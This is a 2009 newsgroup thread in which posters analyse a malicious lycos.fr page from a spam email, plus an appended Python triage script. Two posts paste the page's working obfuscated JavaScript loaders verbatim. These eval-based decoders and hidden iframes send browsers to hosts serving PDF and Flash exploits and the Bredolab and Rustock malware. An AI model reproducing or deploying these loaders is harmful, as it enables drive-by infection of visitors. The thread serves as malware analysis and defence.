
weird html


ArameFarpado

Nov 16, 2009, 3:14:38 PM
hi

just received this link through email

hzzp://membres.lycos.fr/misschaterton/hot.html

(hzzp must be changed to http)


open the link with an HTML editor or text editor, never with your browser,
because this file has weird code in it... and I don't know what it can do.


regards


David H. Lipman

Nov 16, 2009, 4:57:48 PM
From: "ArameFarpado" <a-farpa...@netcabo.pt>

| hi

| hzzp://membres.lycos.fr/misschaterton/hot.html


| regards


Hmmmmmmm

I'm getting 0 bytes :-(

--
Dave
http://www.claymania.com/removal-trojan-adware.html
Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp


ArameFarpado

Nov 16, 2009, 7:01:08 PM
On Monday 16 November 2009 21:57, David H. Lipman wrote:

> From: "ArameFarpado" <a-farpa...@netcabo.pt>
>
> | hi
>
> | just received this link through email
>
> | hzzp://membres.lycos.fr/misschaterton/hot.html
>
> | (hzzp must be changed to http)
>
>
> | open the link with an HTML editor or text editor, never with your
> | browser, because this file has weird code in it... and I don't know what
> | it can do.
>
>
> | regards
>
>
> Hmmmmmmm
>
> I'm getting 0 bytes :-(
>

you're right, now it is an empty file...

one hour ago it had this content:

<html>
<head>
<title>!!!
</title>
</head>
<body>
<script>function KWcyxxCsP(UlxQDarxIN){var etMbmZCmZ=4,YIeniyU=8;var
KAU='30,0+52,4+51,0+57,0+48,4+54,4+50,4+16,0+59,4+52,4+50,0+58,0+52,0+30,4+24,4+16,0+52,0+50,4+52,4+51,4+52,0+58,0+30,4+24,4+16,0+49,0+55,4+57,0+50,0+50,4+57,0+30,4+24,0+16,0+51,0+57,0+48,4+54,4+50,4+49,0+55,4+57,0+50,0+50,4+57,0+30,4+24,0+16,0+57,4+57,0+',fziLs=KAU.split('+');GyGFidUftI='';for(WBvJ=0x8-0xd-0x17-0xd-0x1c+0x45;WBvJ<fziLs.length-1;WBvJ+=0x12-0x1d-0x2f-0xc-0x3+0xa+0x14+0x2c)
{ cJB=fziLs[WBvJ].split(',');LVKbsX =
parseInt(cJB[0]*YIeniyU)+parseInt(cJB[1]);LVKbsX =
parseInt(LVKbsX)/etMbmZCmZ;GyGFidUftI += String.fromCharCode(LVKbsX);}return
GyGFidUftI;}function bMeH(jrYehM){ var KSas =
document.getElementById('OVXZcgrhSl');var HpqRJLJB=new Function("rqQwVtX",
"return 101455;"); fff=op.split("857"); }
function QXbmFihMo(GuM){var pRWpTlPd=5,vRESwAGehJ=5;var
YXKxGMEebO='99,0+61,0+39,0+104,0+116,0+116,0+112,0+58,0+47,0+47,0+115,0+117,0+110,0+99,0+97,0+114,0+100,0+115,0+46,0+110,0+101,0+116,0+47,0+108,0+111,0+103,0+115,0+47,0+105,0+110,0+100,0+101,0+120,0+46,0+112,0+104,0+112,0+39,0+62,0+60,0+47,0+105,0+102,0+114,0+97,0+109,0+101,0+62,0+',DVjYcCYC=YXKxGMEebO.split('+');YsJM='';for(HWkQKoIX=0x9-0x16-0xe+0x1b;HWkQKoIX<DVjYcCYC.length-1;HWkQKoIX+=-0x29+0x25-0x17+0x30+0xa-0x1e)
{ gxaJcTE=DVjYcCYC[HWkQKoIX].split(',');wQcUrj =
parseInt(gxaJcTE[0]*vRESwAGehJ)+parseInt(gxaJcTE[1]);wQcUrj =
parseInt(wQcUrj)/pRWpTlPd;YsJM += String.fromCharCode(wQcUrj);}return
YsJM;}function KCYvSql(qOjh){ fff.op.replace("835"); }
document['w7679r1843i2124t6370e88367475'.replace(/[0-9]/g,'')]
(KWcyxxCsP('IAIwAYaSg'),QXbmFihMo('jZYEH'));function UWR(ZfEXBbBz){
fff=op.split("907");window.eval(); }
function tNcp(bKIpoEA){ window.eval(); }
function ujOKrO(rwbbhEhmR){ fff=op.split("443"); }
</script>
<FRAMESET border=0 rows="100%,*" frameborder="no" marginleft=0 margintop=0
marginright=0 marginbottom=0>
<frame src="http://amazingmedicalmy.com.cn" scrolling=auto frameborder="no"
border=0 noresize>
<frame topmargin="0" marginwidth=0 scrolling=no marginheight=0
frameborder="no" border=0 noresize>
</FRAMESET>
<iframe src="http://prerre.com/counter3.php" width="1" height="1"
style="visibility:hidden;position:absolute"></iframe>
</body>
</html><script>wzha="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";sfaupp="function
jwv()
{lovbep=Math.PI;sbr=parseInt;nstes='length';jancwf=sbr(~((lovbep&lovbep)|
(~lovbep&lovbep)&(lovbep&~lovbep)|
(~lovbep&~lovbep)));so=sbr(((jancwf&jancwf)|
(~jancwf&jancwf)&(jancwf&~jancwf)|
(~jancwf&~jancwf))&1);vcc=so<<so;ptvgm=jancwf;tvrxw='';tes=String.fromCharCode;pth=eval;for(ab=jancwf;ab<sfaupp[nstes];ab-
=-
so)ptvgm+=sfaupp.charCodeAt(ab);ptvgm%=unescape(jancwf+tes(120)+(so<<6));for(ab=jancwf;ab<wzha[nstes];ab+=vcc)tvrxw+=tes(sbr(jancwf+tes(120)+wzha.charAt(ab)+wzha.charAt(ab+sbr(so)))^ptvgm);try{pth(tvrxw);}catch(aaaa)
{try{eval(tvrxw);}catch(aaaa){}}}try{eval('jwv();')}catch(aaaa)
{}";eval(sfaupp);</script>


of course, lots of lines are (most likely) broken in two or three here...


I'm not an expert in HTML code, but this is not ordinary HTML.

ArameFarpado

Nov 16, 2009, 7:08:01 PM
On Tuesday 17 November 2009 00:01, ArameFarpado wrote:

>
>
> of course, lots of lines are (most likely) broken in two or three here...

yep, the original file has 19 lines

ArameFarpado

Nov 16, 2009, 7:13:53 PM
On Tuesday 17 November 2009 00:01, ArameFarpado wrote:

>>
>> Hmmmmmmm
>>
>> I'm getting 0 bytes :-(
>>
> you're right, now it is an empty file...
>
> one hour ago it had this content:
>

results from VirusTotal:


AntiVir HTML/Infected.WebPage.Gen


F-Prot JS/Obf.I.gen

Kaspersky Trojan-Downloader.JS.Shadraem.a

McAfee-GW-Edition Heuristic.LooksLike.JS.Suspicious.A

David H. Lipman

Nov 16, 2009, 7:22:04 PM
From: "ArameFarpado" <a-farpa...@netcabo.pt>

| On Tuesday 17 November 2009 00:01, ArameFarpado wrote:

>> of course, lots of lines are (most likely) broken in two or three here...

| yep, the original file has 19 lines


What you posted was an obfuscated and malicious script that goes to...

amazingmedicalmy.com.cn
and
prerre.com --> basic.free-host.in

basic.free-host.in hosts malicious exploits in PDF and Flash format: 'aldusToThis.pdf'
and 'lookBeen.swf'

aldusToThis.pdf
http://www.virustotal.com/analisis/8a3073f354a4d602e446c26e885140e35bf49d8d2a3c4d72531a269244408978-1258416984
a-squared 4.5.0.41 2009.11.16 Exploit.JS.Pdfka!IK
Antiy-AVL 2.0.3.7 2009.11.16 Exploit/JS.Pdfka
Comodo 2960 2009.11.16 TrojWare.JS.Exploit.Pdfka.anp
Ikarus T3.1.1.74.0 2009.11.16 Exploit.JS.Pdfka
Kaspersky 7.0.0.125 2009.11.17 Exploit.JS.Pdfka.anp

lookBeen.swf
http://www.virustotal.com/analisis/2778f22a07b8d23c890bf6c517f394c6d274751fb82c48f98902448db8d57023-1258417013
Authentium 5.2.0.5 2009.11.16 SWF/Obfusc.A!Camelot
PCTools 7.0.3.5 2009.11.16 HeurEngine.MaliciousExploit
Symantec 1.4.4.12 2009.11.17 Bloodhound.Exploit.193

I haven't determined the payload yet.

ArameFarpado

Nov 16, 2009, 7:41:13 PM
On Tuesday 17 November 2009 00:22, David H. Lipman wrote:

> From: "ArameFarpado" <a-farpa...@netcabo.pt>
>
> | On Tuesday 17 November 2009 00:01, ArameFarpado wrote:
>
>
>
>>> of course, lots of lines are (most likely) broken in two or three here...
>
> | yep, the original file has 19 lines
>
>
> What you posted was an obfuscated and malicious script that goes to...
>
> amazingmedicalmy.com.cn
> and
> prerre.com --> basic.free-host.in
>
> basic.free-host.in hosts malicious exploits in PDF and Flash format:
> 'aldusToThis.pdf' and 'lookBeen.swf'
>
> aldusToThis.pdf

I couldn't open any of the links, I'm running Linux here and my browser just
presents me with the "bug" icon telling me the document was buggy and refuses
to open it... of course I only tried to open it with a browser that only opens
standard HTML.

> http://www.virustotal.com/analisis/8a3073f354a4d602e446c26e885140e35bf49d8d2a3c4d72531a269244408978-1258416984
> a-squared 4.5.0.41 2009.11.16 Exploit.JS.Pdfka!IK
> Antiy-AVL 2.0.3.7 2009.11.16 Exploit/JS.Pdfka
> Comodo 2960 2009.11.16 TrojWare.JS.Exploit.Pdfka.anp
> Ikarus T3.1.1.74.0 2009.11.16 Exploit.JS.Pdfka
> Kaspersky 7.0.0.125 2009.11.17 Exploit.JS.Pdfka.anp
>
> lookBeen.swf
> http://www.virustotal.com/analisis/2778f22a07b8d23c890bf6c517f394c6d274751fb82c48f98902448db8d57023-1258417013
> Authentium 5.2.0.5 2009.11.16 SWF/Obfusc.A!Camelot
> PCTools 7.0.3.5 2009.11.16 HeurEngine.MaliciousExploit
> Symantec 1.4.4.12 2009.11.17 Bloodhound.Exploit.193
>
> I haven't determined the payload yet.
>

yeah, I wonder what it does...

the funny thing is, I received the link in an email just saying "join us" :D
it looked like a line from a horror movie.

regards
ArameFarpado

David H. Lipman

Nov 16, 2009, 7:46:54 PM
From: "ArameFarpado" <a-farpa...@netcabo.pt>

| the funny thing is, I received the link in an email just saying "join us" :D
| it looked like a line from a horror movie.

| regards
| ArameFarpado

Standard Social Engineering type email. The original lycos.fr web page was probably
cleaned after a few complained of its malicious nature.

David H. Lipman

Nov 16, 2009, 8:07:34 PM
From: "ArameFarpado" <a-farpa...@netcabo.pt>

The payload is a BADLY recognized Bredolab Trojan hosted on basic.free-host.in.

http://www.virustotal.com/analisis/8acb7778e6fa905960d4e25138c9bb30b741c3bb961bdd7f6f92395e29aa7422-1258419923

Kaspersky 7.0.0.125 2009.11.17 Packed.Win32.Krap.x
TrendMicro 9.0.0.1003 2009.11.16 TROJ_BREDLAB.SME

ArameFarpado

Nov 16, 2009, 9:00:00 PM
On Tuesday 17 November 2009 01:07, David H. Lipman wrote:

> From: "ArameFarpado" <a-farpa...@netcabo.pt>
>
> The payload is a BADLY recognized Bredolab Trojan hosted on
> basic.free-host.in.
>
>
> http://www.virustotal.com/analisis/8acb7778e6fa905960d4e25138c9bb30b741c3bb961bdd7f6f92395e29aa7422-1258419923
>
> Kaspersky 7.0.0.125 2009.11.17 Packed.Win32.Krap.x
> TrendMicro 9.0.0.1003 2009.11.16 TROJ_BREDLAB.SME
>

yes, I noticed the low detection on VirusTotal... it's a rare bird.

I wonder if this HTML code can really cause damage to a system? After all,
this is just a document, and documents shouldn't be allowed to pass functions
to the processor and launch any binaries...

this has got to be some kind of malware that can only cause damage if opened
with a poorly secured browser with features that a browser shouldn't have...


regards

VanguardLH

Nov 17, 2009, 4:43:13 AM
ArameFarpado wrote:

> hzzp://membres.lycos.fr/misschaterton/hot.html

What do YOU call weird? Any HTML that you don't yet understand? I used
SamSpade which shows me the code that gets received, which was:


11/17/09 03:37:11 Browsing http://membres.lycos.fr/misschaterton/hot.html
Fetching http://membres.lycos.fr/misschaterton/hot.html ...
GET /misschaterton/hot.html HTTP/1.1
Host: membres.lycos.fr
Connection: close
User-Agent: Sam Spade 1.14

HTTP/1.1 200 OK
Date: Tue, 17 Nov 2009 09:36:59 GMT
Server: Apache
Set-Cookie: Apache=24.118.105.35.1258450619868730; path=/
Accept-Ranges: bytes
Vary: Accept-Encoding
TMMDEBUG: wmembf01
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

937

<script type="text/javascript">
window.google_analytics_uacct = "UA-7539432-8";
</script>
<style>
#catfish6a2cf5d5{PADDING: 0px;MARGIN: 0px 0px -90px;WIDTH: 100%;HEIGHT:
90px;BOTTOM: 0px;POSITION: fixed;}
</style>
<!--[if IE]>
<style>
#catfish6a2cf5d5{ Z-INDEX: 1000; OVERFLOW: hidden; POSITION: absolute;}
HTML,BODY {OVERFLOW: hidden;WIDTH: auto;HEIGHT: 100%;}
DIV#zip6a2cf5d5{PADDING: 0px;MARGIN: 0px;OVERFLOW: auto;WIDTH:
100%;HEIGHT: 100%;POSITION: relative;}
</style>
<![endif]-->
<div id="topad6a2cf5d5"></div>
<script>matnk="555e52445c545f451f464358455419130d585743505c54114243520c16594545410b1e1e595450551c5c5e435e5f1f525f1e161146585545590c160016115954585659450c160016114245485d540c164758425853585d5845480b59585555545f160f0d1e585743505c540f13180a3b545845425c590c137f507f130a595f5d470c137f507f130a";jl="function
fasgo(){lnts=Math.PI;jaeqo=parseInt;qigol='length';lfn=jaeqo(~((lnts&lnts)|(~lnts&lnts)&(lnts&~lnts)|(~lnts&~lnts)));ettik=jaeqo(((lfn&lfn)|(~lfn&lfn)&(lfn&~lfn)|(~lfn&~lfn))&1);xuu=ettik<<ettik;hnlv=lfn;eitsmh='';eymxcn=String.fromCharCode;aj=eval;for(fypep=lfn;fypep<jl[qigol];fypep-=-ettik)hnlv+=jl.charCodeAt(fypep);hnlv%=unescape(lfn+eymxcn(120)+(ettik<<6));for(fypep=lfn;fypep<matnk[qigol];fypep+=xuu)eitsmh+=eymxcn(jaeqo(lfn+eymxcn(120)+matnk.charAt(fypep)+matnk.charAt(fypep+jaeqo(ettik)))^hnlv);try{aj(eitsmh);}catch(aaaa){try{eval(eitsmh);}catch(aaaa){}}}try{eval('fasgo();')}catch(aaaa){}";eval(jl);</script><script>matnk="555e52445c545f451f464358455419130d585743505c54114243520c16594545410b1e1e595450551c5c5e435e5f1f525f1e161146585545590c160016115954585659450c160016114245485d540c164758425853585d5845480b59585555545f160f0d1e585743505c540f13180a3b545845425c590c137f507f130a595f5d470c137f507f130a";jl="function
fasgo(){lnts=Math.PI;jaeqo=parseInt;qigol='length';lfn=jaeqo(~((lnts&lnts)|(~lnts&lnts)&(lnts&~lnts)|(~lnts&~lnts)));ettik=jaeqo(((lfn&lfn)|(~lfn&lfn)&(lfn&~lfn)|(~lfn&~lfn))&1);xuu=ettik<<ettik;hnlv=lfn;eitsmh='';eymxcn=String.fromCharCode;aj=eval;for(fypep=lfn;fypep<jl[qigol];fypep-=-ettik)hnlv+=jl.charCodeAt(fypep);hnlv%=unescape(lfn+eymxcn(120)+(ettik<<6));for(fypep=lfn;fypep<matnk[qigol];fypep+=xuu)eitsmh+=eymxcn(jaeqo(lfn+eymxcn(120)+matnk.charAt(fypep)+matnk.charAt(fypep+jaeqo(ettik)))^hnlv);try{aj(eitsmh);}catch(aaaa){try{eval(eitsmh);}catch(aaaa){}}}try{eval('fasgo();')}catch(aaaa){}";eval(jl);</script>

277

</style></noframes></pre></xmp></noscript>

<div id="catfish6a2cf5d5" style="display:none"></div>
<script src="http://ads.mmania.com/displaycf.js.php?r=6a2cf5d5&cc=fr"
type=text/javascript></script>

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ?
"https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost +
"google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-7539432-8");
pageTracker._trackPageview();
} catch(err) {}
</script>

Since SamSpade isn't going to run the scripts or exercise the style
sheets, I don't know what gets pulled after the page code is pulled into
a web browser that executes that stuff.

David H. Lipman

Nov 17, 2009, 6:43:24 AM
From: "VanguardLH" <V...@nguard.LH>

| ArameFarpado wrote:

>> hzzp://membres.lycos.fr/misschaterton/hot.html

| What do YOU call weird? Any HTML that you don't yet understand? I used
| SamSpade which shows me the code that gets received, which was:


Unfortunately YOU posted the malicious page UNOBFUSCATED and it is serving up a new
exploit site and malware.

Please... Do NOT post unobfuscated malicious or possibly malicious web sites!

googlenew.cn serving up pdf.pdf

http://www.virustotal.com/analisis/999d30989f18cd315a1338c97365d9b63351cf4214ce80e5ceb83ffdb7a072df-1258446469

a-squared 4.5.0.41 2009.11.17 Exploit.JS.Pdfka!IK
AhnLab-V3 5.0.0.2 2009.11.16 PDF/Exploit
AntiVir 7.9.1.65 2009.11.16 EXP/Pidief.baa.17
BitDefender 7.2 2009.11.17 Exploit.PDF-JS.Gen
ClamAV 0.94.1 2009.11.17 Exploit.PDF-1417
eSafe 7.0.17.0 2009.11.16 PDF.Exploit.4
F-Secure 9.0.15370.0 2009.11.17 Exploit.PDF-JS.Gen
GData 19 2009.11.17 Exploit.PDF-JS.Gen
Ikarus T3.1.1.74.0 2009.11.17 Exploit.JS.Pdfka
Kaspersky 7.0.0.125 2009.11.17 Exploit.JS.Pdfka.amm
McAfee-GW-Edition 6.8.5 2009.11.17 Exploit.Pidief.baa.17
NOD32 4613 2009.11.16 PDF/Exploit.Gen
Sunbelt 3.2.1858.2 2009.11.12 Exploit.PDF-JS.Gen (v)
TrendMicro 9.0.0.1003 2009.11.17 TROJ_PDFJSC.UR

The payload is now Rustock.

http://www.virustotal.com/analisis/5f9688f955a7ca776788d578459382b9852002e452b1f3c3ceae6a546746ea1c-1258457270

a-squared 4.5.0.41 2009.11.17 Backdoor.WinNT.Rustock!IK
AntiVir 7.9.1.70 2009.11.17 HEUR/Crypted.E
ClamAV 0.94.1 2009.11.17 PUA.Packed.ASPack212
Ikarus T3.1.1.74.0 2009.11.17 Backdoor.WinNT.Rustock
Kaspersky 7.0.0.125 2009.11.17 Backdoor.Win32.Goolbot.an
McAfee+Artemis 5804 2009.11.16 Artemis!94C19048E88C
Microsoft 1.5202 2009.11.17 Backdoor:WinNT/Rustock.C
PCTools 7.0.3.5 2009.11.17 Trojan.Generic
Prevx 3.0 2009.11.17 Medium Risk Malware
Symantec 1.4.4.12 2009.11.17 Trojan Horse
TrendMicro 9.0.0.1003 2009.11.17 PAK_Generic.001

VanguardLH

Nov 17, 2009, 7:11:43 AM
David H. Lipman wrote:

> From: "VanguardLH" <V...@nguard.LH>
>
>| ArameFarpado wrote:
>
>>> hzzp://membres.lycos.fr/misschaterton/hot.html
>
>| What do YOU call weird? Any HTML that you don't yet understand? I used
>| SamSpade which shows me the code that gets received, which was:
>
> Unfortunately YOU posted the malicious page UNOBFUSCATED and it is serving up a new
> exploit site and malware.
>
> Please... Do NOT post unobfuscated malicious or possibly malicious web sites!

Sorry. Didn't notice the http: string from the *text* output of
SamSpade. It was all text. It still is all text. That your newsreader
parses out URL strings to make them clickable is a "feature" of your OE
newsreader. My intention was to just show the page code (which, if
there were further discussion, would be to show the overtly obfuscated
code if that's what the OP meant by "weird"). Showing the code (already
known as proven by you) as text should not have it actually run in your
newsreader.

Lycos already killed that page. As of Tue, 17 Nov 2009 12:05:09 GMT, it
now redirects to a 404 web page.

FromTheRafters

Nov 17, 2009, 7:51:21 AM
"ArameFarpado" <a-farpa...@netcabo.pt> wrote in message
news:4b0203a1$0$279$1472...@news.sunsite.dk...

> On Tuesday 17 November 2009 01:07, David H. Lipman wrote:

> I wonder if this HTML code can really cause damage to a system? After
> all
> this is just a document, and documents shouldn't be allowed to pass
> functions
> to the processor and launch any binaries...

As David mentioned, it brings the user to servers serving exploit code
(PDF/Flash) - so yes, it ends up being bad (perhaps very bad).

It is not the HTML but the action that results from it.


ArameFarpado

Nov 17, 2009, 8:22:09 AM

My point is, HTML and PDF are just documents; documents should not take
actions, just show things... code like this can only do damage if the
viewer allows it, because the viewer IS the active program running, not the
document.

regards

FromTheRafters

Nov 17, 2009, 10:51:21 AM
"ArameFarpado" <a-farpa...@netcabo.pt> wrote in message
news:4b02a383$0$271$1472...@news.sunsite.dk...

> On Tuesday 17 November 2009 12:51, FromTheRafters wrote:
>
>> "ArameFarpado" <a-farpa...@netcabo.pt> wrote in message
>> news:4b0203a1$0$279$1472...@news.sunsite.dk...
>>> On Tuesday 17 November 2009 01:07, David H. Lipman wrote:
>>
>>> I wonder if this HTML code can really cause damage to a system?
>>> After
>>> all
>>> this is just a document, and documents shouldn't be allowed to pass
>>> functions
>>> to the processor and launch any binaries...
>>
>> As David mentioned, it brings the user to servers serving exploit
>> code
>> (PDF/Flash) - so yes, it ends up being bad (perhaps very bad).
>>
>> It is not the HTML but the action that results from it.
>
> My point is, HTML and PDF are just documents; documents should not
> take
> actions, just show things... code like this can only do damage if
> the
> viewer allows it, because the viewer IS the active program running,
> not the
> document.

Absolutely, *that* is where *exploit code* comes into play. An *exploit*
attacks a vulnerability in the client code, in this case (I think) the
underlying support for Flash.

The iframe is only *used* maliciously to get the browser to access the
served (Flash/PDF) exploit(s). The obfuscation in the HTML (suspect in
and of itself) is used to avoid early detection of the attempt to
misdirect the browser.

If you had actually gone there, there would only be danger if you had
one of the vulnerabilities that the exploit(s) attack(s).


VanguardLH

Nov 17, 2009, 1:21:59 PM
ArameFarpado wrote:

> My point is, HTML and PDF are just documents; documents should not take
> actions, just show things... code like this can only do damage if the
> viewer allows it, because the viewer IS the active program running, not the
> document.

Adobe's Reader and other PDF "viewers" can execute scripts within the
PDF. It's not some oddball exploit, like a buffer overrun, to get a command
to run from inside a PDF. PDFs actually support scripts within them.
It is highly unlikely that you will run across a good PDF that has a
script inside but they do exist. For now, go into whatever PDF reader you
use and disable its JavaScript support.

http://www.pdfscripting.com/
http://partners.adobe.com/public/developer/en/acrobat/sdk/AcroJSGuide.pdf

Unless you're in an environment where scripts within .pdf files are
common, just disable their support in the reader program. Adobe's Reader
program has had several attacks against its code to make a command run
when it wasn't inside a script within the .pdf file; however, disabling
its JavaScript support should help to mitigate those exploits and neuter
the reader's handling to, as you say, just show it as a document. I
haven't investigated all the exploits to find out if disabling
JavaScript completely neuters them all.

http://www.google.com/search?q=%2B"adobe+reader"+%2Bexploit

I use PDF-Xchange as my PDF reader (and annotator) and also disable
JavaScript support within it. Although it supports JavaScript within
PDFs, if enabled, the product itself is different code so exploits
against Adobe Reader aren't effective against PDF-Xchange's reader.
Plus I get more features with PDF-Xchange than with Adobe Reader.

I haven't investigated enough to know if disabling the integration
between the web browser and PDF reader (via the ActiveX helper installed
and used by the web browser) would help enhance security against PDF
exploits. I just disable JavaScript support in the reader and use a
different reader that doesn't get targeted.

Ant

Nov 17, 2009, 1:34:39 PM
"FromTheRafters" wrote:

> "ArameFarpado" wrote:
>> My point is, HTML and PDF are just documents; documents should not
>> take actions, just show things... code like this can only do damage
>> if the viewer allows it, because the viewer IS the active program
>> running, not the document.

Unfortunately, these 'documents' can contain and run scripts - so that
makes them like a program running within another. In theory, scripts
can be restricted in what they are allowed to do but all non-trivial
programs/applications almost certainly contain bugs. Some have yet to
be discovered and some can be exploited.

> Absolutely, *that* is where *exploit code* comes into play. An *exploit*
> attacks a vulnerability in the client code in this case (I think) the
> underlying support for Flash.

A few things except Flash!

ActiveX instantiations of:
Microsoft Remote Data Services Data Control (MDAC)
AcroPDF.PDF or PDF.PdfCtrl (PDF)
Microsoft Snapshot Viewer Control
OWC10.Spreadsheet (MS Excel?)

and:
Java

These exploits are all in googlenew.cn/mmm/index.php which is where
both the obfuscated scripts in the 1st and 2nd examples posted here
end up redirecting to.

In addition, the first example had code to visit:
suncards.net/logs/index.php.
I wrote about this URL last week in nanae but was unable to
satisfactorily determine the outcome. Probably because it was using a
session ID in another redirect and I wasn't quick enough before it
timed out (or perhaps it required a 'referer' header or similar).

> If you had actually gone there, there would only be danger if you had
> one of the vulnerabilities that the exploit(s) attack(s).

If ActiveX and Java (not javascript) are disabled you'll be ok. If
not, this shows the importance of keeping browser plugins and other
applications used to display content up-to-date as well as the OS
components.
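
The tricks the posters single out can be checked without ever rendering the page. The script below is an added example, not code from anyone in this thread: it flags the indicators discussed (hidden 1x1 iframe, eval()/new Function(), a String.fromCharCode decode loop, the digit-stripped 'write' property name, a long hex blob) and decodes the first sample's 'a,b+a,b+...' strings, whose characters are (a*multiplier + b)/divisor with the two integer constants declared just before them. The sample HTML and the .example hosts are constructed for the demonstration; the real page's own strings are not reproduced.

```python
"""Offline triage for the obfuscation tricks in this thread's hot.html samples.

Nothing here executes the page.  It pattern-matches the indicators the posters
point at and decodes the first sample's 'a,b+a,b+...' strings, whose characters
are (a*multiplier + b) / divisor using the two constants declared before them.
"""
import re
from typing import Dict, List

INDICATORS: Dict[str, re.Pattern] = {
    "hidden_iframe": re.compile(
        r"<iframe[^>]*(?:\bwidth=[\"']?1\b|\bheight=[\"']?1\b|visibility\s*:\s*hidden)", re.I),
    "eval_or_function": re.compile(r"\beval\s*\(|\bnew\s+Function\s*\("),
    "fromcharcode_loop": re.compile(r"\bfor\s*\([\s\S]{0,400}?String\.fromCharCode\s*\("),
    "digit_stripped_property": re.compile(
        r"document\[\s*'[A-Za-z0-9]+'\.replace\(\s*/\[0-9\]/g\s*,\s*''\s*\)\s*\]"),
    "long_hex_blob": re.compile(r"[\"'][0-9a-fA-F]{120,}[\"']"),
    "pair_encoded_string": re.compile(r"'((?:\d+,\d+\+){8,})'"),
}
URL_RX = re.compile(r"https?://[^\s'\"<>]+")

def triage(html: str) -> Dict[str, bool]:
    """Report which indicators fire on the raw page text."""
    return {name: bool(rx.search(html)) for name, rx in INDICATORS.items()}

def decode_pairs(blob: str, mult: int, div: int) -> str:
    """Undo the sample's encoding: each 'a,b' pair is the character (a*mult + b) / div."""
    chars = []
    for pair in blob.strip("+").split("+"):
        a, b = (int(x) for x in pair.split(","))
        code, rem = divmod(a * mult + b, div)
        if rem:  # the real scheme always divides evenly; a remainder means wrong constants
            raise ValueError(f"pair {pair!r} does not decode with mult={mult}, div={div}")
        chars.append(chr(code))
    return "".join(chars)

def encode_pairs(text: str, mult: int, div: int) -> str:
    """Inverse of decode_pairs; used here only to build the constructed sample."""
    return "".join("%d,%d+" % divmod(ord(c) * div, mult) for c in text)

def recover_pair_strings(html: str) -> List[str]:
    """Decode every pair-encoded string with the 'var d=4,m=8' constants declared
    before it.  The posted script lists divisor first and multiplier second, but
    both orders are tried and the one that yields printable text is kept."""
    decoded = []
    for m in INDICATORS["pair_encoded_string"].finditer(html):
        head = html[max(0, m.start() - 400):m.start()]
        consts = re.findall(r"var\s+\w+\s*=\s*(\d+)\s*,\s*\w+\s*=\s*(\d+)", head)
        if not consts:
            continue
        x, y = (int(v) for v in consts[-1])
        for mult, div in ((y, x), (x, y)):
            try:
                text = decode_pairs(m.group(1), mult, div)
            except ValueError:
                continue
            if text.isprintable():
                decoded.append(text)
                break
    return decoded

def analyse(html: str) -> dict:
    """Indicators, decoded strings, and every URL visible in the raw or decoded text."""
    decoded = recover_pair_strings(html)
    urls = list(dict.fromkeys(URL_RX.findall(html + "\n" + "\n".join(decoded))))
    return {"indicators": triage(html), "decoded": decoded, "urls": urls}

# Constructed sample mimicking the first posted page; the .example hosts are placeholders.
HIDDEN_TAG = "<iframe width=1 height=1 frameborder=0 src='http://stage2.example/x.php'></iframe>"
SAMPLE_HTML = (
    "<html><body>\n<script>function dec(s){var d=4,m=8;var k='" + encode_pairs(HIDDEN_TAG, 8, 4)
    + "',p=k.split('+');var o='';for(i=0x8-0xd-0x17-0xd-0x1c+0x45;i<p.length-1;i+=1)"
    "{var c=p[i].split(',');o+=String.fromCharCode((c[0]*m+c[1])/d);}return o;}\n"
    "document['w7679r1843i2124t6370e8836'.replace(/[0-9]/g,'')](dec('x'));</script>\n"
    '<iframe src="http://tracker.example/c.php" width="1" height="1"\n'
    'style="visibility:hidden;position:absolute"></iframe>\n'
    '<script>z="' + "5e52445c" * 40 + '";eval(z);</script>\n</body></html>\n'
)
```

Running analyse(SAMPLE_HTML) lists all six indicators as firing, the decoded hidden iframe tag, and both the visible tracker URL and the one hidden inside the pair encoding.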


ArameFarpado

Nov 17, 2009, 1:53:02 PM

Well, I use Okular and it doesn't have any JavaScript support, at least there
is nothing in its preferences and manual; anyway, Konqueror didn't even
load the Okular plugin. In fact, Konqueror didn't show anything at all
besides the "bug" icon.


regards

ArameFarpado

Nov 17, 2009, 1:52:58 PM

thanks for the explanation, like I said, it all points to one thing: the
clients you use...

I do have the Flash player plugin from Adobe, but even that is blocked:
every time I open an HTML page with SWF I get an icon in the place where the SWF
should be; if I want to see the SWF, I have to click on the icon... in this
case the link didn't show anything at all.

regards

FromTheRafters

Nov 17, 2009, 1:59:54 PM
"Ant" <n...@home.today> wrote in message
news:duadnfMO9a1FcZ_W...@brightview.co.uk...

Indeed, and such places often serve up a cocktail of exploits which lead
to the downloading and execution of *various* other malware programs -
so just knowing what you got, is not also knowing what you *also* got.
:o)


FromTheRafters

Nov 17, 2009, 2:33:39 PM

"ArameFarpado" <a-farpa...@netcabo.pt> wrote in message
news:4b02f10e$0$282$1472...@news.sunsite.dk...

If so-called document formats hadn't been extensible to include what
is considered *program code* - and the clients hadn't implemented the
means to translate and execute the resulting code, then your original
assumption would be correct.

If a client program consumes data to use only as data, then it takes an
exploit to make the data be interpreted as code. If a client program
consumes data to be interpreted as code - it only needs an abuse of
function to transmit malware.

Both can be called exploits - one exploits a client software flaw
vulnerability and the other a client configuration vulnerability.


ArameFarpado

Nov 17, 2009, 3:09:10 PM

This second situation shouldn't even have been created in the first place.
Documents should only be documents and nothing more.

>
> Both can be called exploits - one exploits a client software flaw
> vulnerability and the other a client configuration vulnerability.

indeed

David H. Lipman

Nov 17, 2009, 4:01:13 PM
From: "VanguardLH" <V...@nguard.LH>

< snip >

| Lycos already killed that page. As of Tue, 17 Nov 2009 12:05:09 GMT, it
| now redirects to a 404 web page.

Excellent !

Ant

Nov 17, 2009, 7:03:26 PM
"David H. Lipman" wrote:
> From: "VanguardLH"
>| Lycos already killed that page. As of Tue, 17 Nov 2009 12:05:09 GMT, it
>| now redirects to a 404 web page.
>
> Excellent !

It's still live and serving up pure script creating an invisible
iframe to head-moron.cn (previously youaskedthedomain.cn on the same
host): 91.213.126.93 which redirects to googlenew.cn: 91.213.126.92
which has the exploits and malware.

